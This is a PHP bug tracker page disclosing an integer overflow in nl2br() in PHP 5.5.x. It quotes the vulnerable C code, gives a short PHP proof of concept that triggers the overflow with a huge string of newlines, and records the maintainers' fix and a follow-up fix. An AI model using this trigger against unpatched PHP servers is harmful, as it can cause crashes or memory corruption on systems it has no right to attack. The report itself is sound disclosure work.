php.net |  support |  documentation |  report a bug |  advanced search |  search howto |  statistics |  random bug |  login
Sec Bug #72268 Integer Overflow in nl2br()
Submitted: 2016-05-26 15:53 UTC Modified: 2016-07-07 09:34 UTC
From: taoguangchen at icloud dot com Assigned: stas (profile)
Status: Closed Package: *General Issues
PHP Version: 5.5.36 OS:
Private report: No CVE-ID: None
 [2016-05-26 15:53 UTC] taoguangchen at icloud dot com
Description:
------------
```
PHP_FUNCTION(nl2br)
{
	/* in brief this inserts <br /> or <br> before matched regexp \n\r?|\r\n? */
	char		*tmp, *str;
	int		new_length;
	char		*end, *target;
	int		repl_cnt = 0;
	int		str_len;
	zend_bool	is_xhtml = 1;

	if (zend_parse_parameters(ZEND_NUM_ARGS() TSRMLS_CC, "s|b", &str, &str_len, &is_xhtml) == FAILURE) {
		return;
	}
	...
		{
		size_t repl_len = is_xhtml ? (sizeof("<br />") - 1) : (sizeof("<br>") - 1);

		new_length = str_len + repl_cnt * repl_len; // ==> integer overflow
	...
		RETURN_STRINGL(tmp, new_length, 0);
```

PoC:
```
<?php

ini_set('memory_limit', -1);
$str = nl2br(str_repeat("\n", 0xffffffff/14+1));
var_dump(strlen($str));

?>

Fix:
checking new_length


Patches

Add a Patch

Pull Requests

Add a Pull Request

History

AllCommentsChangesGit/SVN commitsRelated reports
 [2016-06-16 04:53 UTC] stas@php.net
-Assigned To: +Assigned To: stas
 [2016-06-16 04:53 UTC] stas@php.net
See bug #72403
 [2016-06-21 06:53 UTC] stas@php.net
-Status: Assigned +Status: Closed
 [2016-06-21 06:53 UTC] stas@php.net
The fix for this bug has been committed.

Snapshots of the sources are packaged every three hours; this change
will be in the next snapshot. You can grab the snapshot at
http://snaps.php.net/.

 For Windows:

http://windows.php.net/snapshots/
 
Thank you for the report, and for helping us make PHP better.


 [2016-07-06 16:03 UTC] php-e1b at deemzed dot uk
The fix for bug #72268 has not made it into the official PHP 5.5.37, PHP 5.6.23 releases as indicated by announce/in the changelogs, PHP_FUNCTION(nl2br):

        int             new_length;
 [2016-07-07 09:34 UTC] ab@php.net
A follow up fix is in the scope of bug #72403, see 25bd11cf271f801efa346195d540f3d8e3bcb0ef.

Thanks.
 
PHP Copyright © 2001-2024 The PHP Group
All rights reserved.
Last updated: Tue Mar 19 03:01:29 2024 UTC